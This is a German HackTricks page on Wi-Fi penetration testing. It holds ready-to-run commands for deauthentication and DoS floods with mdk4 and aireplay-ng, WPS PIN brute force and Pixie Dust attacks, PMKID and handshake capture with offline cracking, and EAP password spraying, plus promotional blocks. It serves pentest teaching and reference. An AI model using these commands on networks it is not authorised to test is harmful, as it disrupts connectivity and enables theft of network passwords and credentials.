.. | ||
evil-twin-eap-tls.md | ||
README.md |
Pentesting Wifi
Erlernen Sie AWS-Hacking von Null auf Held mit htARTE (HackTricks AWS Red Team Expert)!
Andere Möglichkeiten, HackTricks zu unterstützen:
- Wenn Sie Ihr Unternehmen in HackTricks beworben sehen möchten oder HackTricks als PDF herunterladen möchten, überprüfen Sie die ABONNEMENTPLÄNE!
- Holen Sie sich das offizielle PEASS & HackTricks-Merch
- Entdecken Sie The PEASS Family, unsere Sammlung exklusiver NFTs
- Treten Sie der 💬 Discord-Gruppe oder der Telegram-Gruppe bei oder folgen Sie uns auf Twitter 🐦 @hacktricks_live.
- Teilen Sie Ihre Hacking-Tricks, indem Sie PRs an die HackTricks und HackTricks Cloud Github-Repositorys einreichen.
Treten Sie dem HackenProof Discord Server bei, um mit erfahrenen Hackern und Bug-Bounty-Jägern zu kommunizieren!
Hacking-Einblicke
Beschäftigen Sie sich mit Inhalten, die sich mit dem Nervenkitzel und den Herausforderungen des Hackens befassen
Echtzeit-Hack-News
Bleiben Sie mit der schnelllebigen Hacking-Welt durch Echtzeitnachrichten und Einblicke auf dem Laufenden
Neueste Ankündigungen
Bleiben Sie über die neuesten Bug-Bounties und wichtigen Plattformupdates informiert
Treten Sie uns bei Discord und beginnen Sie noch heute mit der Zusammenarbeit mit Top-Hackern!
Wifi-Grundbefehle
ip link show #List available interfaces
iwconfig #List available interfaces
airmon-ng check kill #Kill annoying processes
airmon-ng start wlan0 #Monitor mode
airmon-ng stop wlan0mon #Managed mode
airodump-ng wlan0mon #Scan (default 2.4Ghz)
airodump-ng wlan0mon --band a #Scan 5Ghz
airodump-ng wlan0mon --wps #Scan WPS
iwconfig wlan0 mode monitor #Put in mode monitor
iwconfig wlan0mon mode managed #Quit mode monitor - managed mode
iw dev wlan0 scan | grep "^BSS\|SSID\|WSP\|Authentication\|WPS\|WPA" #Scan available wifis
iwlist wlan0 scan #Scan available wifis
Werkzeuge
EAPHammer
git clone https://github.com/s0lst1c3/eaphammer.git
./kali-setup
Airgeddon
Airgeddon ist ein vielseitiges Tool zur Prüfung der Sicherheit von drahtlosen Netzwerken.
mv `which dhcpd` `which dhcpd`.old
apt install isc-dhcp-server
apt-get install sslstrip asleap bettercap mdk4 hostapd beef-xss lighttpd dsniff hostapd-wpe
Führen Sie airgeddon mit Docker aus
docker run \
--rm \
-ti \
--name airgeddon \
--net=host \
--privileged \
-p 3000:3000 \
-v /tmp:/io \
-e DISPLAY=$(env | grep DISPLAY | awk -F "=" '{print $2}') \
v1s1t0r1sh3r3/airgeddon
wifiphisher
Es kann Evil Twin, KARMA und Known Beacons Angriffe durchführen und dann eine Phishing-Vorlage verwenden, um das tatsächliche Netzwerkkennwort zu erhalten oder Zugangsdaten für soziale Netzwerke zu erfassen.
git clone https://github.com/wifiphisher/wifiphisher.git # Download the latest revision
cd wifiphisher # Switch to tool's directory
sudo python setup.py install # Install any dependencies
Wifite2
Dieses Tool automatisiert WPS/WEP/WPA-PSK-Angriffe. Es wird automatisch:
- Setzen des Interfaces in den Monitor-Modus
- Scannen nach möglichen Netzwerken - und ermöglicht es Ihnen, das Opfer auszuwählen
- Bei WEP - WEP-Angriffe starten
- Bei WPA-PSK
- Bei WPS: Pixie Dust-Angriff und Brute-Force-Angriff (seien Sie vorsichtig, der Brute-Force-Angriff könnte lange dauern). Beachten Sie, dass keine Null-PIN oder Datenbank-/generierten PINs ausprobiert werden.
- Versuchen, den PMKID vom AP zu erfassen, um ihn zu knacken
- Versuchen, Clients des AP zu deauthentifizieren, um einen Handshake zu erfassen
- Bei PMKID oder Handshake versuchen, mit den top5000 Passwörtern Brute-Force durchzuführen.
Angriffsübersicht
- DoS
- Deauthentifizierung/Disassoziierung -- Alle trennen (oder ein bestimmtes ESSID/Client)
- Zufällige Fake-APs -- Verstecke Netze, mögliche Scannerabstürze
- AP überlasten -- Versuchen, den AP zu deaktivieren (normalerweise nicht sehr nützlich)
- WIDS -- Mit dem IDS spielen
- TKIP, EAPOL -- Einige spezifische Angriffe, um einige APs zu DoS
- Knacken
- Knacken von WEP (mehrere Tools und Methoden)
- WPA-PSK
- WPS PIN "Brute-Force"
- WPA PMKID Brute-Force
- [DoS +] WPA-Handshake Erfassung + Knacken
- WPA-MGT
- Benutzername erfassen
- Brute-Force Anmeldedaten
- Evil Twin (mit oder ohne DoS)
- Offener Evil Twin [+ DoS] -- Nützlich, um Captive Portal-Anmeldeinformationen zu erfassen und/oder LAN-Angriffe durchzuführen
- WPA-PSK Evil Twin -- Nützlich für Netzwerkangriffe, wenn Sie das Passwort kennen
- WPA-MGT -- Nützlich, um Firmenanmeldeinformationen zu erfassen
- KARMA, MANA, Loud MANA, Bekanntes Beacon
- + Offen -- Nützlich, um Captive Portal-Anmeldeinformationen zu erfassen und/oder LAN-Angriffe durchzuführen
- + WPA -- Nützlich, um WPA-Handshakes zu erfassen
DOS
Deauthentifizierungspakete
Beschreibung von hier:.
Deauthentifizierungs-Angriffe, eine verbreitete Methode im Wi-Fi-Hacking, beinhalten das Fälschen von "Management"-Frames, um Geräte gewaltsam von einem Netzwerk zu trennen. Diese unverschlüsselten Pakete täuschen Clients vor, dass sie vom legitimen Netzwerk stammen, was Angreifern ermöglicht, WPA-Handshakes für Knackzwecke zu sammeln oder Netzwerkverbindungen dauerhaft zu stören. Diese Taktik, alarmierend in ihrer Einfachheit, wird weit verbreitet eingesetzt und hat erhebliche Auswirkungen auf die Netzwerksicherheit.
Deauthentifizierung mit Aireplay-ng
aireplay-ng -0 0 -a 00:14:6C:7E:40:80 -c 00:0F:B5:34:30:30 ath0
- -0 bedeutet Deauthentifizierung
- 1 ist die Anzahl der zu sendenden Deauths (Sie können mehrere senden, wenn Sie möchten); 0 bedeutet, sie kontinuierlich zu senden
- -a 00:14:6C:7E:40:80 ist die MAC-Adresse des Zugriffspunkts
- -c 00:0F:B5:34:30:30 ist die MAC-Adresse des Clients, der deauthentifiziert werden soll; wenn dies ausgelassen wird, wird eine Rundruf-Deauthentifizierung gesendet (funktioniert nicht immer)
- ath0 ist der Schnittstellennamen
Trennungspakete
Trennungspakete, ähnlich wie Deauthentifizierungspakete, sind eine Art von Verwaltungsrahmen, die in Wi-Fi-Netzwerken verwendet werden. Diese Pakete dienen dazu, die Verbindung zwischen einem Gerät (wie einem Laptop oder Smartphone) und einem Zugriffspunkt (AP) zu trennen. Der Hauptunterschied zwischen Trennung und Deauthentifizierung liegt in ihren Anwendungsszenarien. Während ein AP Deauthentifizierungspakete aussendet, um Rogue-Geräte explizit aus dem Netzwerk zu entfernen, werden Trennungspakete in der Regel gesendet, wenn der AP einen Neustart durchführt, heruntergefahren wird oder umzieht, was die Trennung aller verbundenen Knoten erforderlich macht.
Dieser Angriff kann von mdk4 (Modus "d") durchgeführt werden:
# -c <channel>
# -b victim_client_mac.txt contains the MAC address of the device to eliminate
# -e WifiName is the name of the wifi
# -B BSSID is the BSSID of the AP
# Notice that these and other parameters aare optional, you could give onli the ESSID and md4k will automatically search for it, wait for finding clients and deauthenticate them
mdk4 wlan0mon d -c 5 -b victim_client_mac.txt -E WifiName -B EF:60:69:D7:69:2F
Weitere DOS-Angriffe durch mdk4
Hier klicken.
ANGRIFFSMODUS b: Beacon-Flutung
Sendet Beacon-Frames, um gefälschte APs bei Clients anzuzeigen. Dies kann manchmal Netzwerkscanner und sogar Treiber zum Absturz bringen!
# -a Use also non-printable caracters in generated SSIDs and create SSIDs that break the 32-byte limit
# -w n (create Open) t (Create WPA/TKIP) a (Create WPA2/AES)
# -m use real BSSIDS
# All the parameters are optional and you could load ESSIDs from a file
mdk4 wlan0mon b -a -w nta -m
ANGRIFFSMODUS a: Authentifizierungsverweigerung
Das Senden von Authentifizierungsrahmen an alle erreichbaren Access Points (APs) in Reichweite kann diese APs überlasten, insbesondere wenn zahlreiche Clients beteiligt sind. Dieser intensive Datenverkehr kann zu Systeminstabilität führen, wodurch einige APs einfrieren oder sogar zurückgesetzt werden können.
# -a BSSID send random data from random clients to try the DoS
# -i BSSID capture and repeat pakets from authenticated clients
# -m use real MACs
# only -a or -i can be used
mdk4 wlan0mon a [-i EF:60:69:D7:69:2F] [-a EF:60:69:D7:69:2F] -m
ANGRIFFSMODUS p: SSID-Sondierung und Bruteforcing
Das Sondieren von Zugriffspunkten (APs) überprüft, ob eine SSID ordnungsgemäß offengelegt wird und bestätigt die Reichweite des APs. Diese Technik, in Verbindung mit dem Bruteforcing versteckter SSIDs mit oder ohne Wortliste, hilft bei der Identifizierung und dem Zugriff auf verborgene Netzwerke.
ANGRIFFSMODUS m: Ausnutzung von Michael-Gegenmaßnahmen
Das Senden von zufälligen oder duplizierten Paketen an verschiedene QoS-Warteschlangen kann Michael-Gegenmaßnahmen auf TKIP-APs auslösen, was zu einer einminütigen Abschaltung des APs führt. Diese Methode ist eine effiziente DoS (Denial of Service)-Angriffstaktik.
# -t <BSSID> of a TKIP AP
# -j use inteligent replay to create the DoS
mdk4 wlan0mon m -t EF:60:69:D7:69:2F [-j]
ANGRIFFSMODUS e: EAPOL Start- und Logoff-Paketinjektion
Das Überschwemmen eines AP mit EAPOL Start-Frames erzeugt gefälschte Sitzungen, überlastet den AP und blockiert legitime Clients. Alternativ können durch das Einspeisen von gefälschten EAPOL Logoff-Nachrichten Clients zwangsweise getrennt werden. Beide Methoden stören die Netzwerkdienste effektiv.
# Use Logoff messages to kick clients
mdk4 wlan0mon e -t EF:60:69:D7:69:2F [-l]
ANGRIFFSMODUS s: Angriffe auf IEEE 802.11s Mesh-Netzwerke
Verschiedene Angriffe auf die Verbindungsverwaltung und das Routing in Mesh-Netzwerken.
ANGRIFFSMODUS w: WIDS-Verwirrung
Das Verbinden von Clients mit mehreren WDS-Knoten oder gefälschten Rogue-APs kann Intrusion Detection und Prevention Systems manipulieren, Verwirrung stiften und potenziellen Missbrauch des Systems ermöglichen.
# -z activate Zero_Chaos' WIDS exploit (authenticates clients from a WDS to foreign APs to make WIDS go nuts)
mkd4 -e <SSID> -c <channel> [-z]
ANGRIFFSMODUS f: Paket-Fuzzer
Ein Paket-Fuzzer mit vielfältigen Paketquellen und einem umfassenden Satz von Modifikatoren zur Paketmanipulation.
Airggedon
Airgeddon bietet die meisten der in den vorherigen Kommentaren vorgeschlagenen Angriffe:
WPS
WPS (Wi-Fi Protected Setup) vereinfacht den Prozess des Verbindens von Geräten mit einem Router, verbessert die Einrichtungsgeschwindigkeit und -einfachheit für Netzwerke, die mit WPA oder WPA2 Personal verschlüsselt sind. Es ist für die leicht kompromittierbare WEP-Sicherheit unwirksam. WPS verwendet eine 8-stellige PIN, die in zwei Hälften validiert wird, was sie anfällig für Brute-Force-Angriffe macht, aufgrund ihrer begrenzten Anzahl von Kombinationen (11.000 Möglichkeiten).
WPS-Brute-Force
Es gibt 2 Hauptwerkzeuge, um diese Aktion auszuführen: Reaver und Bully.
- Reaver wurde entwickelt, um ein robuster und praktischer Angriff gegen WPS zu sein und wurde gegen eine Vielzahl von Zugriffspunkten und WPS-Implementierungen getestet.
- Bully ist eine neue Implementierung des WPS-Brute-Force-Angriffs, geschrieben in C. Es hat mehrere Vorteile gegenüber dem Originalcode von Reaver: weniger Abhängigkeiten, verbesserte Speicher- und CPU-Leistung, korrekte Behandlung der Byte-Reihenfolge und einen robusteren Satz von Optionen.
Der Angriff nutzt die Schwachstelle der WPS-PIN aus, insbesondere die Offenlegung der ersten vier Ziffern und die Rolle der letzten Ziffer als Prüfsumme, was den Brute-Force-Angriff erleichtert. Verteidigungen gegen Brute-Force-Angriffe, wie das Blockieren von MAC-Adressen aggressiver Angreifer, erfordern eine MAC-Adressrotation, um den Angriff fortzusetzen.
Nach dem Erhalten der WPS-PIN mit Tools wie Bully oder Reaver kann der Angreifer den WPA/WPA2 PSK ableiten und so einen dauerhaften Netzwerkzugriff sicherstellen.
reaver -i wlan1mon -b 00:C0:CA:78:B1:37 -c 9 -b -f -N [-L -d 2] -vvroot
bully wlan1mon -b 00:C0:CA:78:B1:37 -c 9 -S -F -B -v 3
Intelligenter Brute-Force
Dieser verfeinerte Ansatz zielt darauf ab, WPS-PINs unter Verwendung bekannter Schwachstellen anzugreifen:
- Vorab entdeckte PINs: Nutzen Sie eine Datenbank bekannter PINs, die mit bestimmten Herstellern verknüpft sind, die einheitliche WPS-PINs verwenden. Diese Datenbank korreliert die ersten drei Oktette der MAC-Adressen mit wahrscheinlichen PINs für diese Hersteller.
- PIN-Generierungsalgorithmen: Nutzen Sie Algorithmen wie ComputePIN und EasyBox, die WPS-PINs basierend auf der MAC-Adresse des AP berechnen. Der Arcadyan-Algorithmus erfordert zusätzlich eine Geräte-ID, was dem PIN-Generierungsprozess eine weitere Ebene hinzufügt.
WPS Pixie Dust Angriff
Dominique Bongard entdeckte einen Fehler in einigen Access Points (APs) bezüglich der Erstellung von geheimen Codes, bekannt als Nonces (E-S1 und E-S2). Wenn diese Nonces herausgefunden werden können, wird das Knacken der WPS-PIN des APs einfach. Der AP enthüllt die PIN innerhalb eines speziellen Codes (Hash), um zu beweisen, dass er legitim ist und kein gefälschter (Rogue) AP ist. Diese Nonces sind im Wesentlichen die "Schlüssel" zum Entsperren des "Safes", der die WPS-PIN enthält. Weitere Informationen dazu finden Sie hier.
Einfach ausgedrückt besteht das Problem darin, dass einige APs nicht zufällig genug Schlüssel für die Verschlüsselung der PIN während des Verbindungsvorgangs verwendet haben. Dies macht die PIN anfällig dafür, von außerhalb des Netzwerks geraten zu werden (offline Brute-Force-Angriff).
reaver -i wlan1mon -b 00:C0:CA:78:B1:37 -c 9 -K 1 -N -vv
bully wlan1mon -b 00:C0:CA:78:B1:37 -d -v 3
Wenn Sie das Gerät nicht in den Überwachungsmodus wechseln möchten oder reaver
und bully
Probleme haben, können Sie OneShot-C ausprobieren. Dieses Tool kann den Pixie Dust-Angriff ausführen, ohne in den Überwachungsmodus wechseln zu müssen.
./oneshot -i wlan0 -K -b 00:C0:CA:78:B1:37
Null Pin Angriff
Einige schlecht konzipierte Systeme erlauben sogar, dass ein Null-PIN (ein leerer oder nicht vorhandener PIN) Zugriff gewährt, was ziemlich ungewöhnlich ist. Das Tool Reaver ist in der Lage, diese Schwachstelle zu testen, im Gegensatz zu Bully.
reaver -i wlan1mon -b 00:C0:CA:78:B1:37 -c 9 -f -N -g 1 -vv -p ''
Airgeddon
Alle vorgeschlagenen WPS-Angriffe können einfach mit airgeddon durchgeführt werden.
- 5 und 6 ermöglichen es Ihnen, Ihre benutzerdefinierte PIN zu versuchen (falls Sie eine haben)
- 7 und 8 führen den Pixie Dust Angriff durch
- 13 ermöglicht es Ihnen, die NULL PIN zu testen
- 11 und 12 werden die PINs, die mit dem ausgewählten AP aus verfügbaren Datenbanken zusammenhängen, zusammentragen und mögliche PINs generieren, indem sie ComputePIN, EasyBox und optional Arcadyan (empfohlen, warum nicht?) verwenden
- 9 und 10 werden jede mögliche PIN testen
WEP
So kaputt und heutzutage ungenutzt. Wissen Sie einfach, dass airgeddon eine WEP-Option namens "All-in-One" hat, um diese Art von Schutz anzugreifen. Mehr Tools bieten ähnliche Optionen.
Treten Sie dem HackenProof Discord Server bei, um mit erfahrenen Hackern und Bug-Bounty-Jägern zu kommunizieren!
Hacking Insights
Beschäftigen Sie sich mit Inhalten, die in die Spannung und Herausforderungen des Hackens eintauchen
Echtzeit-Hack-News
Bleiben Sie mit der schnelllebigen Hacking-Welt durch Echtzeit-Nachrichten und Einblicke auf dem Laufenden
Neueste Ankündigungen
Bleiben Sie über die neuesten Bug-Bounties und wichtige Plattform-Updates informiert
Treten Sie uns bei Discord bei und beginnen Sie noch heute mit den Top-Hackern zusammenzuarbeiten!
WPA/WPA2 PSK
PMKID
Im Jahr 2018 enthüllte hashcat eine neue Angriffsmethode, die einzigartig ist, da sie nur ein einziges Paket benötigt und keine Clients erforderlich sind, die mit dem Ziel-AP verbunden sind - nur die Interaktion zwischen dem Angreifer und dem AP.
Viele moderne Router fügen dem ersten EAPOL-Frame während der Assoziation ein optionales Feld hinzu, bekannt als Robust Security Network
. Dies beinhaltet den PMKID
.
Wie im Originalbeitrag erklärt, wird der PMKID unter Verwendung bekannter Daten erstellt:
PMKID = HMAC-SHA1-128(PMK, "PMK Name" | MAC_AP | MAC_STA)
Angesichts dessen, dass der "PMK-Name" konstant ist, kennen wir die BSSID des AP und der Station, und der PMK
ist identisch mit dem aus einem vollständigen 4-Wege-Handshake, kann hashcat diese Informationen verwenden, um den PSK zu knacken und das Passwort wiederherzustellen!
Um diese Informationen zu sammeln und das Passwort lokal per Bruteforce zu knacken, können Sie Folgendes tun:
airmon-ng check kill
airmon-ng start wlan0
git clone https://github.com/ZerBea/hcxdumptool.git; cd hcxdumptool; make; make install
hcxdumptool -o /tmp/attack.pcap -i wlan0mon --enable_status=1
#You can also obtains PMKIDs using eaphammer
./eaphammer --pmkid --interface wlan0 --channel 11 --bssid 70:4C:A5:F8:9A:C1
Die PMKIDs, die erfasst wurden, werden in der Konsole angezeigt und auch im Verzeichnis _/tmp/attack.pcap_ gespeichert.
Konvertiere nun den Capture in das Format von hashcat/john und knacke es:
hcxtools/hcxpcaptool -z hashes.txt /tmp/attack.pcapng
hashcat -m 16800 --force hashes.txt /usr/share/wordlists/rockyou.txt
john hashes.txt --wordlist=/usr/share/wordlists/rockyou.txt
Bitte beachten Sie, dass das Format eines korrekten Hashs 4 Teile enthält, wie: 4017733ca8db33a1479196c2415173beb808d7b83cfaa4a6a9a5aae7566f6461666f6e65436f6e6e6563743034383131343838
. Wenn Ihrer nur 3 Teile enthält, ist er ungültig (die PMKID-Erfassung war nicht gültig).
Beachten Sie, dass hcxdumptool
auch Handshakes erfasst (etwas Ähnliches wird angezeigt: MP:M1M2 RC:63258 EAPOLTIME:17091
). Sie können die Handshakes in das hashcat/john-Format mit cap2hccapx
umwandeln.
tcpdump -r /tmp/attack.pcapng -w /tmp/att.pcap
cap2hccapx pmkid.pcapng pmkid.hccapx ["Filter_ESSID"]
hccap2john pmkid.hccapx > handshake.john
john handshake.john --wordlist=/usr/share/wordlists/rockyou.txt
aircrack-ng /tmp/att.pcap -w /usr/share/wordlists/rockyou.txt #Sometimes
Ich habe festgestellt, dass einige mit diesem Tool erfassten Handshakes selbst bei Kenntnis des richtigen Passworts nicht geknackt werden konnten. Ich würde empfehlen, Handshakes auch auf herkömmliche Weise zu erfassen, wenn möglich, oder mehrere davon mit diesem Tool zu erfassen.
Handshake-Erfassung
Ein Angriff auf WPA/WPA2-Netzwerke kann durch Erfassen eines Handshakes und den Versuch, das Passwort offline zu knacken, ausgeführt werden. Dieser Prozess beinhaltet das Überwachen der Kommunikation eines bestimmten Netzwerks und BSSID auf einem bestimmten Kanal. Hier ist eine übersichtliche Anleitung:
- Identifiziere die BSSID, den Kanal und einen verbundenen Client des Zielnetzwerks.
- Verwende
airodump-ng
, um den Netzwerkverkehr auf dem angegebenen Kanal und BSSID zu überwachen, in der Hoffnung, einen Handshake zu erfassen. Der Befehl wird wie folgt aussehen:
airodump-ng wlan0 -c 6 --bssid 64:20:9F:15:4F:D7 -w /tmp/psk --output-format pcap
- Um die Chance zu erhöhen, einen Handshake zu erfassen, trennen Sie den Client vorübergehend vom Netzwerk, um eine erneute Authentifizierung zu erzwingen. Dies kann mit dem Befehl
aireplay-ng
durch Senden von Deauthentifizierungspaketen an den Client erreicht werden:
aireplay-ng -0 0 -a 64:20:9F:15:4F:D7 wlan0 #Send generic deauth packets, may not work in all scenarios
Note, dass da der Client deauthentifiziert wurde, er versuchen könnte, sich mit einem anderen AP zu verbinden oder in anderen Fällen mit einem anderen Netzwerk.
Sobald in airodump-ng
einige Handshake-Informationen erscheinen, bedeutet dies, dass der Handshake erfasst wurde und du das Abhören stoppen kannst:
Sobald der Handshake erfasst ist, kannst du ihn mit aircrack-ng
knacken:
aircrack-ng -w /usr/share/wordlists/rockyou.txt -b 64:20:9F:15:4F:D7 /tmp/psk*.cap
Überprüfen Sie, ob der Handshake in der Datei vorhanden ist
aircrack
aircrack-ng psk-01.cap #Search your bssid/essid and check if any handshake was capture
tshark
tshark -r psk-01.cap -n -Y eapol #Filter handshake messages #You should have the 4 messages.
cowpatty -r psk-01.cap -s "ESSID" -f -
Wenn dieses Tool einen unvollständigen Handshake eines ESSID vor dem vollständigen findet, wird es den gültigen nicht erkennen.
pyrit
apt-get install pyrit #Not working for newer versions of kali
pyrit -r psk-01.cap analyze
WPA Enterprise (MGT)
In Unternehmens-WLAN-Setups stoßen Sie auf verschiedene Authentifizierungsmethoden, die jeweils unterschiedliche Sicherheitsstufen und Verwaltungsfunktionen bieten. Wenn Sie Tools wie airodump-ng
zur Inspektion des Netzwerkverkehrs verwenden, könnten Sie Kennungen für diese Authentifizierungstypen bemerken. Einige gängige Methoden sind:
6A:FE:3B:73:18:FB -58 19 0 0 1 195 WPA2 CCMP MGT NameOfMyWifi
- EAP-GTC (Generic Token Card):
- Diese Methode unterstützt Hardware-Token und Einmalpasswörter innerhalb von EAP-PEAP. Im Gegensatz zu MSCHAPv2 verwendet sie keine Peer-Herausforderung und sendet Passwörter im Klartext an den Zugriffspunkt, was ein Risiko für Downgrade-Angriffe darstellt.
- EAP-MD5 (Message Digest 5):
- Beinhaltet das Senden des MD5-Hash des Passworts vom Client. Es wird nicht empfohlen aufgrund der Anfälligkeit für Wörterbuchangriffe, des Mangels an Serverauthentifizierung und der Unfähigkeit, sessionsspezifische WEP-Schlüssel zu generieren.
- EAP-TLS (Transport Layer Security):
- Nutzt sowohl Client- als auch Serverzertifikate zur Authentifizierung und kann benutzerbasierte und sessionsspezifische WEP-Schlüssel dynamisch generieren, um die Kommunikation zu sichern.
- EAP-TTLS (Tunneled Transport Layer Security):
- Bietet eine gegenseitige Authentifizierung über einen verschlüsselten Tunnel sowie eine Methode zur Ableitung dynamischer, benutzerspezifischer, sessionsspezifischer WEP-Schlüssel. Es erfordert nur Serverzertifikate, wobei Clients Anmeldeinformationen verwenden.
- PEAP (Protected Extensible Authentication Protocol):
- Funktioniert ähnlich wie EAP, indem es einen TLS-Tunnel für geschützte Kommunikation erstellt. Es ermöglicht die Verwendung schwächerer Authentifizierungsprotokolle auf Basis von EAP aufgrund des Schutzes, den der Tunnel bietet.
- PEAP-MSCHAPv2: Oft als PEAP bezeichnet, kombiniert es den anfälligen MSCHAPv2-Herausforderungs-/Antwortmechanismus mit einem schützenden TLS-Tunnel.
- PEAP-EAP-TLS (oder PEAP-TLS): Ähnlich wie EAP-TLS, initiiert jedoch einen TLS-Tunnel, bevor Zertifikate ausgetauscht werden, was eine zusätzliche Sicherheitsebene bietet.
Weitere Informationen zu diesen Authentifizierungsmethoden finden Sie hier und hier.
Benutzername erfassen
Beim Lesen von https://tools.ietf.org/html/rfc3748#page-27 sieht es so aus, als ob bei Verwendung von EAP die "Identitäts"-Nachrichten unterstützt werden müssen und der Benutzername in den "Antwort-Identitäts"-Nachrichten im Klartext gesendet wird.
Selbst bei Verwendung einer der sichersten Authentifizierungsmethoden: PEAP-EAP-TLS ist es möglich, den im EAP-Protokoll gesendeten Benutzernamen zu erfassen. Um dies zu tun, erfassen Sie eine Authentifizierungskommunikation (starten Sie airodump-ng
auf einem Kanal und wireshark
auf der gleichen Schnittstelle) und filtern Sie die Pakete nach eapol
.
Im "Antwort, Identität"-Paket wird der Benutzername des Clients angezeigt.
Anonyme Identitäten
Die Identitätsverbergung wird sowohl von EAP-PEAP als auch von EAP-TTLS unterstützt. Im Kontext eines WLAN-Netzwerks wird eine EAP-Identitätsanfrage in der Regel vom Zugriffspunkt (AP) während des Assoziationsprozesses initiiert. Um den Schutz der Benutzeranonymität zu gewährleisten, enthält die Antwort des EAP-Clients auf dem Gerät des Benutzers nur die für den initialen RADIUS-Server erforderlichen Informationen zur Verarbeitung der Anfrage. Dieses Konzept wird durch die folgenden Szenarien veranschaulicht:
- EAP-Identität = anonym
- In diesem Szenario verwenden alle Benutzer das Pseudonym "anonym" als ihren Benutzeridentifikator. Der initiale RADIUS-Server fungiert entweder als EAP-PEAP- oder EAP-TTLS-Server und ist für die Verwaltung des serverseitigen Teils des PEAP- oder TTLS-Protokolls verantwortlich. Die innere (geschützte) Authentifizierungsmethode wird entweder lokal behandelt oder an einen entfernten (Heim-)RADIUS-Server delegiert.
- EAP-Identität = anonym@realm_x
- In dieser Situation verbergen Benutzer aus verschiedenen Bereichen ihre Identitäten, während sie ihre jeweiligen Bereiche angeben. Dies ermöglicht es dem initialen RADIUS-Server, die EAP-PEAP- oder EAP-TTLS-Anfragen an RADIUS-Server in ihren Heimbereichen weiterzuleiten, die als PEAP- oder TTLS-Server fungieren. Der initiale RADIUS-Server fungiert ausschließlich als RADIUS-Relaisknoten.
- Alternativ kann der initiale RADIUS-Server als EAP-PEAP- oder EAP-TTLS-Server fungieren und die geschützte Authentifizierungsmethode entweder selbst behandeln oder an einen anderen Server weiterleiten. Diese Option erleichtert die Konfiguration unterschiedlicher Richtlinien für verschiedene Bereiche.
In EAP-PEAP initiiert der PEAP-Server, sobald der TLS-Tunnel zwischen dem PEAP-Server und dem PEAP-Client hergestellt ist, eine EAP-Identitätsanfrage und überträgt sie durch den TLS-Tunnel. Der Client antwortet auf diese zweite EAP-Identitätsanfrage, indem er eine EAP-Identitätsantwort sendet, die die wahre Identität des Benutzers durch den verschlüsselten Tunnel enthält. Dieser Ansatz verhindert effektiv die Offenlegung der tatsächlichen Identität des Benutzers für jeden, der den 802.11-Verkehr belauscht.
EAP-TTLS folgt einem etwas anderen Verfahren. Mit EAP-TTLS authentifiziert sich der Client normalerweise mit PAP oder CHAP, gesichert durch den TLS-Tunnel. In diesem Fall enthält der Client einen Benutzername-Attribut und entweder ein Passwort- oder CHAP-Passwort-Attribut in der initialen TLS-Nachricht, die nach der Tunnelherstellung gesendet wird.
Unabhängig vom gewählten Protokoll erhält der PEAP/TTLS-Server nach Herstellung des TLS-Tunnels Kenntnis von der wahren Identität des Benutzers. Die wahre Identität kann als Benutzer@Bereich oder einfach Benutzer dargestellt werden. Wenn der PEAP/TTLS-Server auch für die Authentifizierung des Benutzers verantwortlich ist, besitzt er nun die Identität des Benutzers und fährt mit der durch den TLS-Tunnel geschützten Authentifizierungsmethode fort. Andernfalls kann der PEAP/TTLS-Server eine neue RADIUS-Anfrage an den Heim-RADIUS-Server des Benutzers weiterleiten. Diese neue RADIUS-Anfrage lässt die PEAP- oder TTLS-Protokollschicht weg. In Fällen, in denen die geschützte Authentifizierungsmethode EAP ist, werden die inneren EAP-Nachrichten ohne den EAP-PEAP- oder EAP-TTLS-Wrapper an den Heim-RADIUS-Server gesendet. Das Benutzername-Attribut der ausgehenden RADIUS-Nachricht enthält die wahre Identität des Benutzers und ersetzt den anonymen Benutzernamen aus der eingehenden RADIUS-Anfrage. Wenn die geschützte Authentifizierungsmethode PAP oder CHAP ist (nur von TTLS unterstützt), werden das Benutzername- und andere Authentifizierungsattribute aus der TLS-Nutzlast in der ausgehenden RADIUS-Nachricht ersetzt und ersetzen den anonymen Benutzernamen und die TTLS-EAP-Nachrichtenattribute in der eingehenden RADIUS-Anfrage.
Weitere Informationen finden Sie unter https://www.interlinknetworks.com/app_notes/eap-peap.htm
EAP-Bruteforce (Passwort-Spray)
Wenn erwartet wird, dass der Client einen Benutzernamen und ein Passwort verwendet (beachten Sie, dass EAP-TLS in diesem Fall nicht gültig ist), könnten Sie versuchen, eine Liste von Benutzernamen (siehe nächster Abschnitt) und Passwörtern zu erhalten und versuchen, auf den Zugriff zuzugreifen, indem Sie air-hammer. verwenden.
./air-hammer.py -i wlan0 -e Test-Network -P UserPassword1 -u usernames.txt
Du könntest diesen Angriff auch mit eaphammer
durchführen:
./eaphammer --eap-spray \
--interface-pool wlan0 wlan1 wlan2 wlan3 wlan4 \
--essid example-wifi \
--password bananas \
--user-list users.txt
Client-Angriffstheorie
Netzwerkauswahl und Roaming
- Das 802.11-Protokoll definiert, wie sich eine Station einem Extended Service Set (ESS) anschließt, gibt jedoch nicht die Kriterien für die Auswahl eines ESS oder eines Zugriffspunkts (AP) darin an.
- Stationen können zwischen APs wechseln, die dieselbe ESSID teilen, und so die Konnektivität über ein Gebäude oder ein Gebiet aufrechterhalten.
- Das Protokoll erfordert eine Authentifizierung der Station beim ESS, schreibt jedoch keine Authentifizierung des AP bei der Station vor.
Bevorzugte Netzwerklisten (PNLs)
- Stationen speichern die ESSID jedes drahtlosen Netzwerks, mit dem sie sich verbinden, in ihrer bevorzugten Netzwerkliste (PNL) zusammen mit netzwerkspezifischen Konfigurationsdetails.
- Die PNL wird verwendet, um automatisch eine Verbindung zu bekannten Netzwerken herzustellen und so die Benutzererfahrung durch Vereinfachung des Verbindungsvorgangs zu verbessern.
Passives Scannen
- APs senden regelmäßig Beacon-Frames aus, um ihre Präsenz und Funktionen bekannt zu geben, einschließlich der ESSID des AP, es sei denn, das Senden ist deaktiviert.
- Während des passiven Scannens hören Stationen auf Beacon-Frames. Wenn die ESSID eines Beacons mit einem Eintrag in der PNL der Station übereinstimmt, kann die Station automatisch eine Verbindung zu diesem AP herstellen.
- Das Wissen über die PNL eines Geräts ermöglicht potenzielle Ausnutzung durch Nachahmung der ESSID eines bekannten Netzwerks, um das Gerät dazu zu bringen, sich mit einem Rogue-AP zu verbinden.
Aktives Sondieren
- Aktives Sondieren beinhaltet, dass Stationen Sondierungsanfragen senden, um nahegelegene APs und deren Eigenschaften zu entdecken.
- Gerichtete Sondierungsanfragen zielen auf eine bestimmte ESSID ab und helfen dabei festzustellen, ob ein bestimmtes Netzwerk in Reichweite ist, auch wenn es sich um ein verstecktes Netzwerk handelt.
